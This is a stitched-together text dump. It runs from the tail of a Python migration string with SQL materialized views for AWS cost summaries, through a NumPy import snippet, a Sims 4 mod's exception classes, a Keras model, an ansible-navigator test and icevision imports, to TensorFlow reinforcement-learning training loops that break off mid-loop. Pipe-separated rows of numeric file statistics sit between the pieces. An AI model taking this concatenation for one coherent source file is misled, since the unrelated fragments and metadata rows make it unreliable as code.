WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
product_code,
product_family,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
product_code,
product_family,
instance_type,
ARRAY_AGG(DISTINCT resource_id ORDER BY resource_id) as resource_ids
from (
SELECT usage_start,
product_code,
product_family,
instance_type,
UNNEST(resource_ids) AS resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
product_code,
product_family,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.product_code = r.product_code
AND c.product_family = r.product_family
AND c.instance_type = r.instance_type
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary_service
ON reporting_aws_compute_summary_by_service (usage_start, product_code, product_family, instance_type)
;
CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_region AS(
SELECT ROW_NUMBER() OVER(ORDER BY c.usage_start, c.region, c.availability_zone, c.instance_type) AS id,
c.usage_start,
c.usage_start AS usage_end,
c.region,
c.availability_zone,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
region,
availability_zone,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
region,
availability_zone,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
region,
availability_zone,
instance_type,
ARRAY_AGG(DISTINCT resource_id ORDER BY resource_id) AS resource_ids
from (
SELECT usage_start,
region,
availability_zone,
instance_type,
UNNEST(resource_ids) AS resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
region,
availability_zone,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.region = r.region
AND c.availability_zone = r.availability_zone
AND c.instance_type = r.instance_type
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary_region
ON reporting_aws_compute_summary_by_region (usage_start, region, availability_zone, instance_type)
;
CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_account AS (
SELECT ROW_NUMBER() OVER (ORDER BY c.usage_start, c.usage_account_id, c.account_alias_id, c.instance_type) as id,
c.usage_start,
c.usage_start AS usage_end,
c.usage_account_id,
c.account_alias_id,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
usage_account_id,
account_alias_id,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
usage_account_id,
account_alias_id,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
usage_account_id,
account_alias_id,
instance_type,
array_agg(distinct resource_id order by resource_id) as resource_ids
FROM (
SELECT usage_start,
usage_account_id,
account_alias_id,
instance_type,
UNNEST(resource_ids) as resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= date_trunc('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
usage_account_id,
account_alias_id,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.instance_type = r.instance_type
AND (
(c.usage_account_id = r.usage_account_id) OR
(c.account_alias_id = r.account_alias_id)
)
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary_account
ON reporting_aws_compute_summary_by_account (usage_start, usage_account_id, account_alias_id, instance_type)
;
"""
),
]
| 38.178284
| 131
| 0.664689
| 3,410
| 28,481
| 5.231965
| 0.058651
| 0.076789
| 0.031388
| 0.022869
| 0.926349
| 0.901575
| 0.855894
| 0.814584
| 0.74951
| 0.70764
| 0
| 0.002119
| 0.270988
| 28,481
| 745
| 132
| 38.22953
| 0.85715
| 0.005196
| 0
| 0.703488
| 1
| 0.00436
| 0.910728
| 0.183204
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00436
| 0
| 0.008721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3ef39d7037b4b9b4a8b8c3f605004084edd9f92
| 281
|
py
|
Python
|
example_snippets/multimenus_snippets/Snippets/NumPy/Polynomials/Setup.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Polynomials/Setup.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Polynomials/Setup.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | 1
|
2021-02-04T04:51:48.000Z
|
2021-02-04T04:51:48.000Z
|
import numpy as np
from numpy.polynomial import Polynomial as P
from numpy.polynomial import Chebyshev as T
from numpy.polynomial import Legendre as Le
from numpy.polynomial import Laguerre as La
from numpy.polynomial import Hermite as H
from numpy.polynomial import HermiteE as HE
| 40.142857
| 44
| 0.839858
| 46
| 281
| 5.130435
| 0.369565
| 0.228814
| 0.483051
| 0.635593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13879
| 281
| 7
| 45
| 40.142857
| 0.975207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5827df13f642c5c6fd43c086cf337eaf9f2bd5c3
| 10,959
|
py
|
Python
|
Python/NeonOcean.S4.Main/NeonOcean/S4/Main/Tools/Exceptions.py
|
NeonOcean/Main
|
2d85e6d4428f01294d2d34f1807287b753f7490c
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:44.000Z
|
2021-05-20T19:33:44.000Z
|
Python/NeonOcean.S4.Main/NeonOcean/S4/Main/Tools/Exceptions.py
|
NeonOcean/Main
|
2d85e6d4428f01294d2d34f1807287b753f7490c
|
[
"CC-BY-4.0"
] | 1
|
2020-06-24T22:50:05.000Z
|
2020-06-24T22:50:05.000Z
|
Python/NeonOcean.S4.Main/NeonOcean/S4/Main/Tools/Exceptions.py
|
NeonOcean/S4.Main
|
2d85e6d4428f01294d2d34f1807287b753f7490c
|
[
"CC-BY-4.0"
] | null | null | null |
from __future__ import annotations
import typing
from NeonOcean.S4.Main.Tools import Types
class IncorrectTypeException(Exception):
def __init__ (self, value, valueName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional):
"""
This exception will display error messages such as: 'Expected type 'builtins.str' not 'builtins.int' for 'parameter 1'."
:param value: The incorrectly typed value. When converting the exception to a string it will display the full name of the value's type.
:param valueName: Use this to provide information on what is incorrect.
:type valueName: str
:param correctTypes: A iterable object containing any possibly correct types. The entries can be either a type, a string object, or None.
If an entry is a type, when converting the exception to a string it will display the full name of the type.
:type correctTypes: typing.Tuple[typing.Union[type, str, None], ...]
"""
if not isinstance(valueName, str):
raise IncorrectTypeException(valueName, "valueName", (str,))
if not isinstance(correctTypes, tuple):
raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))
if len(correctTypes) == 0:
raise Exception("This exception must receive at least one correct type.")
for correctTypeIndex in range(len(correctTypes)): # type: int
if isinstance(correctTypes[correctTypeIndex], type):
continue
if isinstance(correctTypes[correctTypeIndex], str):
continue
if correctTypes[correctTypeIndex] is None:
continue
raise IncorrectTypeException(correctTypes[correctTypeIndex], "correctTypes[%d]" % correctTypeIndex, (type, str, None))
self._value = value # type: typing.Any
self._valueName = valueName # type: str
self._correctTypes = correctTypes # type: tuple
self._additional = additional # type: typing.Tuple[typing.Any, ...]
super().__init__(*(value, valueName, correctTypes, *additional))
def __str__ (self):
return GetIncorrectTypeExceptionText(self._value, self._valueName, self._correctTypes, *self._additional)
class IncorrectReturnTypeException(Exception):
def __init__ (self, value, callableName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional):
"""
This exception will display error messages such as: 'Expected 'function' to return a 'builtins.str' not 'builtins.int'."
:param value: The incorrectly typed value. When converting the exception to a string it will display the full name of the value's type.
:param callableName: Use this to provide information on what returned incorrect values.
:type callableName: str
:param correctTypes: A iterable object containing any possibly correct types. The entries can be either a type, a string object or None.
If an entry is a type, when converting the exception to a string it will display the full name of the type.
:type correctTypes: typing.Tuple[typing.Union[type, str, None], ...]
"""
if not isinstance(callableName, str):
raise IncorrectTypeException(callableName, "callableName", (str,))
if not isinstance(correctTypes, tuple):
raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))
if len(correctTypes) == 0:
raise Exception("This exception must receive at least one correct type.")
for correctTypeIndex in range(len(correctTypes)): # type: int
if isinstance(correctTypes[correctTypeIndex], type):
continue
if isinstance(correctTypes[correctTypeIndex], str):
continue
if correctTypes[correctTypeIndex] is None:
continue
raise IncorrectTypeException(correctTypes[correctTypeIndex], "correctTypes[%d]" % correctTypeIndex, (type, str, None))
self._value = value # type: typing.Any
self._callableName = callableName # type: str
self._correctTypes = correctTypes # type: tuple
self._additional = additional # type: typing.Tuple[typing.Any, ...]
super().__init__(*(value, callableName, correctTypes, *additional))
def __str__ (self):
return GetIncorrectReturnTypeExceptionText(self._value, self._callableName, self._correctTypes, *self._additional)
class DoesNotInheritException(Exception):
def __init__ (self, valueName: str, correctParents: typing.Tuple[typing.Union[type, str], ...], *additional):
"""
This exception will display error messages such as: 'Expected 'type' to inherit 'extender'."
:param valueName: Use this to provide information on what is incorrect.
:type valueName: str
:param correctParents: A iterable object containing any possibly correct parents. The entries can be either a type or a string object.
If an entry is a type, when converting the exception to a string it will display the full name of the type.
:type correctParents: typing.Tuple[typing.Union[type, str], ...]
"""
if not isinstance(valueName, str):
raise IncorrectTypeException(valueName, "valueName", (str,))
if not isinstance(correctParents, tuple):
raise IncorrectTypeException(correctParents, "correctParents", (tuple,))
if len(correctParents) == 0:
raise Exception("This exception must receive at least one correct parent.")
for correctParentIndex in range(len(correctParents)): # type: int
if isinstance(correctParents[correctParentIndex], type):
continue
if isinstance(correctParents[correctParentIndex], str):
continue
raise IncorrectTypeException(correctParents[correctParentIndex], "correctParents[%d]" % correctParentIndex, (type, str))
self._valueName = valueName # type: str
self._correctParents = correctParents # type: tuple
self._additional = additional # type: typing.Tuple[typing.Any, ...]
super().__init__(*(valueName, correctParents, *additional))
def __str__ (self):
return GetDoesNotInheritExceptionText(self._valueName, self._correctParents, *self._additional)
class DummyException(Exception):
pass
def GetIncorrectTypeExceptionText (value, valueName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional) -> str:
if not isinstance(valueName, str):
raise IncorrectTypeException(valueName, "valueName", (str,))
if not isinstance(correctTypes, tuple):
raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))
if len(correctTypes) == 0:
raise Exception("This exception must receive at least one correct type")
for correctTypeIndex in range(len(correctTypes)): # type: int
if isinstance(correctTypes[correctTypeIndex], type):
continue
if isinstance(correctTypes[correctTypeIndex], str):
continue
if correctTypes[correctTypeIndex] is None:
continue
raise IncorrectTypeException(correctTypes[correctTypeIndex], "correctTypes[%d]" % correctTypeIndex, (type, str, None))
valueType = type(value)
correctString = "'{}'" + (", '{}'" * (len(correctTypes) - 2) if len(correctTypes) > 2 else "") + (" or '{}'" if len(correctTypes) > 1 else "")
formatList = list()
for correctTypeIndex in range(0, len(correctTypes)):
if isinstance(correctTypes[correctTypeIndex], type) or correctTypes[correctTypeIndex] is None:
formatList.append(Types.GetFullName(correctTypes[correctTypeIndex]))
elif isinstance(correctTypes[correctTypeIndex], str):
formatList.append(correctTypes[correctTypeIndex])
else:
formatList.append("")
formatList.append(Types.GetFullName(valueType))
formatList.append(valueName)
exceptionString = ("Expected type " + correctString + " not '{}' for '{}'").format(*formatList)
for additionalObject in additional: # type: typing.Any
exceptionString += "\n" + str(additionalObject)
return exceptionString
def GetIncorrectReturnTypeExceptionText (value, callableName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional) -> str:
if not isinstance(callableName, str):
raise IncorrectTypeException(callableName, "callableName", (str,))
if not isinstance(correctTypes, tuple):
raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))
if len(correctTypes) == 0:
raise Exception("This exception must receive at least one correct type")
for correctTypeIndex in range(len(correctTypes)): # type: int
if isinstance(correctTypes[correctTypeIndex], type):
continue
if isinstance(correctTypes[correctTypeIndex], str):
continue
if correctTypes[correctTypeIndex] is None:
continue
raise IncorrectTypeException(correctTypes[correctTypeIndex], "correctTypes[%d]" % correctTypeIndex, (type, str, None))
valueType = type(value)
correctString = "'{}'" + (", '{}'" * (len(correctTypes) - 2) if len(correctTypes) > 2 else "") + (" or '{}'" if len(correctTypes) > 1 else "")
formatList = list()
formatList.append(callableName)
for correctTypeIndex in range(0, len(correctTypes)):
if isinstance(correctTypes[correctTypeIndex], type) or correctTypes[correctTypeIndex] is None:
formatList.append(Types.GetFullName(correctTypes[correctTypeIndex]))
elif isinstance(correctTypes[correctTypeIndex], str):
formatList.append(correctTypes[correctTypeIndex])
else:
formatList.append("")
formatList.append(Types.GetFullName(valueType))
exceptionString = ("Expected '{}' to return a '" + correctString + "' not '{}'.").format(*formatList)
for additionalObject in additional: # type: typing.Any
exceptionString += "\n" + str(additionalObject)
return exceptionString
def GetDoesNotInheritExceptionText (valueName: str, correctParents: typing.Tuple[typing.Union[type, str], ...], *additional) -> str:
if not isinstance(valueName, str):
raise IncorrectTypeException(valueName, "valueName", (str,))
if not isinstance(correctParents, tuple):
raise IncorrectTypeException(correctParents, "correctParents", (tuple,))
if len(correctParents) == 0:
raise Exception("This exception must receive at least one correct type")
for correctParentIndex in range(len(correctParents)): # type: int
if isinstance(correctParents[correctParentIndex], type):
continue
if isinstance(correctParents[correctParentIndex], str):
continue
if correctParents[correctParentIndex] is None:
continue
raise IncorrectTypeException(correctParents[correctParentIndex], "correctParents[%d]" % correctParentIndex, (type, str, None))
correctString = "'{}'" + (", '{}'" * (len(correctParents) - 2) if len(correctParents) > 2 else "") + (" or '{}'" if len(correctParents) > 1 else "")
formatList = list()
formatList.append(valueName)
for correctParentIndex in range(0, len(correctParents)):
if isinstance(correctParents[correctParentIndex], type) or correctParents[correctParentIndex] is None:
formatList.append(Types.GetFullName(correctParents[correctParentIndex]))
elif isinstance(correctParents[correctParentIndex], str):
formatList.append(correctParents[correctParentIndex])
else:
formatList.append("")
exceptionString = ("Expected '{}' to inherit " + correctString + "").format(*formatList)
for additionalObject in additional: # type: typing.Any
exceptionString += "\n" + str(additionalObject)
return exceptionString
| 40.290441
| 151
| 0.747605
| 1,192
| 10,959
| 6.821309
| 0.100671
| 0.089534
| 0.025089
| 0.022138
| 0.84762
| 0.816628
| 0.790063
| 0.772599
| 0.772599
| 0.772599
| 0
| 0.00212
| 0.139338
| 10,959
| 271
| 152
| 40.439114
| 0.859945
| 0.197463
| 0
| 0.777778
| 0
| 0
| 0.081994
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.006173
| 0.018519
| 0.018519
| 0.135802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58352ed7d67ded5afdaafc6da286a70db200c9c2
| 1,459
|
py
|
Python
|
fashion_mnist/model.py
|
lifeich1/play-tensorflow
|
b5396f0e3a1d2405db546570c2d6a50e7b65811f
|
[
"WTFPL"
] | null | null | null |
fashion_mnist/model.py
|
lifeich1/play-tensorflow
|
b5396f0e3a1d2405db546570c2d6a50e7b65811f
|
[
"WTFPL"
] | null | null | null |
fashion_mnist/model.py
|
lifeich1/play-tensorflow
|
b5396f0e3a1d2405db546570c2d6a50e7b65811f
|
[
"WTFPL"
] | null | null | null |
import tensorflow as tf
model = tf.keras.Sequential()
model.add(tf.keras.layers.Reshape((28, 28, 1), input_shape=(28, 28, )))
model.add(tf.keras.layers.Conv2D(32, (5, 5)))
model.add(tf.keras.layers.BatchNormalization(3))
model.add(tf.keras.layers.Activation(tf.nn.relu))
model.add(tf.keras.layers.MaxPool2D((2, 2, )))
model.add(tf.keras.layers.Conv2D(64, (5, 5)))
model.add(tf.keras.layers.BatchNormalization(3))
model.add(tf.keras.layers.Activation(tf.nn.relu))
model.add(tf.keras.layers.MaxPool2D((2, 2, )))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(1024))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation(tf.nn.relu))
model.add(tf.keras.layers.Dropout(0.2))
model.add(tf.keras.layers.Dense(512))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation(tf.nn.relu))
model.add(tf.keras.layers.Dropout(0.3))
model.add(tf.keras.layers.Dense(512))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation(tf.nn.relu))
model.add(tf.keras.layers.Dropout(0.4))
model.add(tf.keras.layers.Dense(512))
model.add(tf.keras.layers.BatchNormalization())
model.add(tf.keras.layers.Activation(tf.nn.relu))
model.add(tf.keras.layers.Dropout(0.5))
model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))
model.compile(optimizer=tf.train.AdamOptimizer(),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
| 39.432432
| 71
| 0.747772
| 236
| 1,459
| 4.610169
| 0.186441
| 0.180147
| 0.248162
| 0.372243
| 0.819853
| 0.800551
| 0.719669
| 0.719669
| 0.719669
| 0.719669
| 0
| 0.036337
| 0.056888
| 1,459
| 36
| 72
| 40.527778
| 0.75436
| 0
| 0
| 0.53125
| 0
| 0
| 0.026749
| 0.021262
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5881edc44473e5047c72654f3ff197f821b68517
| 203
|
py
|
Python
|
tests/unit/test_yaml.py
|
didib/ansible-navigator
|
62fdbd05f25fb2d79133b3ab207f53ac2f2d6d36
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_yaml.py
|
didib/ansible-navigator
|
62fdbd05f25fb2d79133b3ab207f53ac2f2d6d36
|
[
"Apache-2.0"
] | 1
|
2022-02-04T02:38:15.000Z
|
2022-02-04T02:38:15.000Z
|
tests/unit/test_yaml.py
|
ganeshrn/ansible-navigator
|
1580b5e4a4d715fa4bb844bfeeb40f1ac8e628f6
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-11-17T09:45:18.000Z
|
2021-11-17T09:45:18.000Z
|
import ansible_navigator._yaml as yaml_import
def test_check_yaml_imports():
assert yaml_import.yaml is not None
assert yaml_import.Dumper is not None
assert yaml_import.Loader is not None
| 25.375
| 45
| 0.793103
| 33
| 203
| 4.606061
| 0.454545
| 0.263158
| 0.315789
| 0.197368
| 0.328947
| 0.328947
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 203
| 7
| 46
| 29
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 1
| 0
| 1.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
54492ed147e2710a37840384faea86e95db7ea06
| 130
|
py
|
Python
|
icevision/models/mmdet/common/bbox/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 580
|
2020-09-10T06:29:57.000Z
|
2022-03-29T19:34:54.000Z
|
icevision/models/mmdet/common/bbox/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 691
|
2020-09-05T03:08:34.000Z
|
2022-03-31T23:47:06.000Z
|
icevision/models/mmdet/common/bbox/fastai/__init__.py
|
lgvaz/mantisshrimp2
|
743cb7df0dae7eb1331fc2bb66fc9ca09db496cd
|
[
"Apache-2.0"
] | 105
|
2020-09-09T10:41:35.000Z
|
2022-03-25T17:16:49.000Z
|
from icevision.models.mmdet.common.bbox.fastai.callbacks import *
from icevision.models.mmdet.common.bbox.fastai.learner import *
| 43.333333
| 65
| 0.830769
| 18
| 130
| 6
| 0.555556
| 0.240741
| 0.351852
| 0.444444
| 0.740741
| 0.740741
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 130
| 2
| 66
| 65
| 0.885246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
544a77728e9243a262e6800217447c440e88823c
| 47,586
|
py
|
Python
|
tf_rl/common/train.py
|
Rowing0914/TF2_RL
|
c1b7f9b376cbecf01deb17f76f8e761035ed336a
|
[
"MIT"
] | 8
|
2020-01-13T03:29:50.000Z
|
2021-11-19T00:59:42.000Z
|
tf_rl/common/train.py
|
Rowing0914/TF2_RL
|
c1b7f9b376cbecf01deb17f76f8e761035ed336a
|
[
"MIT"
] | 5
|
2020-11-13T17:40:40.000Z
|
2022-03-12T00:11:33.000Z
|
tf_rl/common/train.py
|
Rowing0914/TF2_RL
|
c1b7f9b376cbecf01deb17f76f8e761035ed336a
|
[
"MIT"
] | 1
|
2021-04-02T13:42:39.000Z
|
2021-04-02T13:42:39.000Z
|
import time
from collections import deque
from tf_rl.common.utils import *
from tf_rl.common.visualise import visualise_act_and_dist
"""
===== Value Based Algorithm =====
TODO: think about incorporating PER's memory updating procedure into the model
so that, we can unify train_DQN and train_DQN_PER
"""
def train_DQN(agent, env, policy, replay_buffer, reward_buffer, summary_writer):
"""
Training train_script for DQN and other advanced models without PER
:param agent:
:param env:
:param policy:
:param replay_buffer:
:param reward_buffer:
:param params:
:param summary_writer:
:return:
"""
get_ready(agent.params)
time_buffer = list()
global_timestep = tf.compat.v1.train.get_global_step()
log = logger(agent.params)
# normaliser = RunningMeanStd(env.reset().shape[0])
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
cnt_action = list()
done = False
while not done:
# normaliser.update(state)
# normaliser.normalise(state)
action = policy.select_action(agent, state)
next_state, reward, done, info = env.step(action)
replay_buffer.add(state, action, reward, next_state, done)
global_timestep.assign_add(1)
total_reward += reward
state = next_state
cnt_action.append(action)
# for evaluation purpose
if global_timestep.numpy() % agent.params.eval_interval == 0:
agent.eval_flg = True
if (global_timestep.numpy() > agent.params.learning_start) and (
global_timestep.numpy() % agent.params.train_interval == 0):
states, actions, rewards, next_states, dones = replay_buffer.sample(agent.params.batch_size)
loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
# synchronise the target and main models by hard
if (global_timestep.numpy() > agent.params.learning_start) and (
global_timestep.numpy() % agent.params.sync_freq == 0):
agent.manager.save()
agent.target_model.set_weights(agent.main_model.get_weights())
"""
===== After 1 Episode is Done =====
"""
tf.summary.scalar("reward", total_reward, step=global_timestep.numpy())
tf.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
if i >= agent.params.reward_buffer_ep:
tf.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
tf.summary.histogram("taken actions", cnt_action, step=global_timestep.numpy())
# store the episode reward
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss),
policy.current_epsilon(), cnt_action)
time_buffer = list()
if agent.eval_flg:
eval_Agent(agent, env)
agent.eval_flg = False
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_Agent(agent, env, n_trial=agent.params.test_episodes)
env.close()
break
def train_DQN_PER(agent, env, policy, replay_buffer, reward_buffer, Beta, summary_writer):
"""
Training train_script for DQN with PER
:param agent:
:param env:
:param policy:
:param replay_buffer:
:param reward_buffer:
:param params:
:param summary_writer:
:return:
"""
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_global_step()
time_buffer = list()
log = logger(agent.params)
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
cnt_action = list()
done = False
while not done:
action = policy.select_action(agent, state)
next_state, reward, done, info = env.step(action)
replay_buffer.add(state, action, reward, next_state, done)
global_timestep.assign_add(1)
total_reward += reward
state = next_state
cnt_action.append(action)
# for evaluation purpose
if global_timestep.numpy() % agent.params.eval_interval == 0:
agent.eval_flg = True
if (global_timestep.numpy() > agent.params.learning_start) and (
global_timestep.numpy() % agent.params.train_interval == 0):
# PER returns: state, action, reward, next_state, done, weights(a weight for an episode), indices(indices for a batch of episode)
states, actions, rewards, next_states, dones, weights, indices = replay_buffer.sample(
agent.params.batch_size, Beta().numpy())
loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
# add noise to the priorities
batch_loss = np.abs(batch_loss) + agent.params.prioritized_replay_noise
# Update a prioritised replay buffer using a batch of losses associated with each timestep
replay_buffer.update_priorities(indices, batch_loss)
# synchronise the target and main models by hard or soft update
if (global_timestep.numpy() > agent.params.learning_start) and (
global_timestep.numpy() % agent.params.sync_freq == 0):
agent.manager.save()
agent.target_model.set_weights(agent.main_model.get_weights())
"""
===== After 1 Episode is Done =====
"""
tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
if i >= agent.params.reward_buffer_ep:
tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
tf.contrib.summary.histogram("taken actions", cnt_action, step=global_timestep.numpy())
# store the episode reward
reward_buffer.append(total_reward)
time_buffer.append(time.time() - start)
if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss),
policy.current_epsilon(), cnt_action)
time_buffer = list()
if agent.eval_flg:
eval_Agent(agent, env)
agent.eval_flg = False
# check the stopping condition
if global_timestep.numpy() > agent.params.num_frames:
print("=== Training is Done ===")
eval_Agent(agent, env, n_trial=agent.params.test_episodes)
env.close()
break
def pretrain_DQfD(expert, agent, env, policy, replay_buffer, reward_buffer, summary_writer, Beta):
"""
Pre-training API for DQfD: https://arxiv.org/pdf/1704.03732.pdf
:param agent:
:param env:
:param policy:
:param replay_buffer:
:param reward_buffer:
:param params:
:param summary_writer:
:return:
"""
get_ready(agent.params)
global_timestep = tf.compat.v1.train.get_global_step()
time_buffer = list()
log = logger(agent.params)
with summary_writer.as_default():
# for summary purpose, we put all codes in this context
with tf.contrib.summary.always_record_summaries():
for i in itertools.count():
state = env.reset()
total_reward = 0
start = time.time()
cnt_action = list()
done = False
while not done:
action_e = np.argmax(expert.predict(state))
action_l = policy.select_action(agent, state)
next_state, reward, done, info = env.step(action_e)
replay_buffer.add(state, [action_l, action_e], reward, next_state, done)
global_timestep.assign_add(1)
total_reward += reward
